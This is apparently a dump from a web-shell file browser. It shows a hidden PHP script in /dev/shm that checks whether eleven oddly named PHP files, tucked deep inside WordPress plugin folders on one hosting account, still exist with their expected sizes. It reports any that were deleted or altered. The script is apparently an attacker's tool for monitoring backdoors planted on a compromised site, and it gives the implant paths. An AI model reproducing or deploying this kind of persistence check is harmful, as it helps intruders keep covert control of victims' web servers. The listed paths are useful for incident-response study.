?
Current File : //dev/shm/.component
<?php   $r = '/home/tecsnpcc/public_html'; $x = ["/wp-content/plugins/jet-engine/includes/compatibility/packages/woocommerce/inc/listings/blocks-views/block-types/woo.data.php"=>"bd@@46099@@971",
"/wp-content/plugins/woocommerce/src/Internal/RestApi/Routes/V4/Settings/Account/91hero.php"=>"bd@@74317@@954",
"/wp-content/plugins/woocommerce/vendor/wordpress/mcp-adapter/includes/Infrastructure/Observability/Contracts/mod_poll.php"=>"bd@@48465@@962",
"/wp-content/plugins/jet-elements/includes/modules/jet-dashboard/inc/modules/license/joomlastats.php"=>"bd@@49768@@1033",
"/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-images-field/UnderSoftEnginEN.php"=>"bd@@74907@@873",
"/wp-content/plugins/woocommerce/src/Internal/RestApi/Routes/V4/Settings/Emails/Schema/workshop5.php"=>"bd@@99750@@1001",
"/wp-content/plugins/google-site-kit/third-party/phpseclib/phpseclib/phpseclib/Crypt/Common/Formats/Keys/Printing.module.php"=>"bd@@99756@@886",
"/wp-content/plugins/woocommerce/packages/email-editor/vendor-prefixed/packages/Sabberworm/CSS/CSSList/quotes.php"=>"bd@@99760@@855",
"/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Util/MethodTable.php"=>"bd@@99764@@986",
"/wp-content/plugins/woocommerce/src/Internal/RestApi/Routes/V4/Orders/de_DE.php"=>"bd@@99767@@987",
"/wp-content/plugins/woocommerce/lib/packages/Symfony/Component/CssSelector/Exception/thumbnails.php"=>"bd@@50426@@948"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');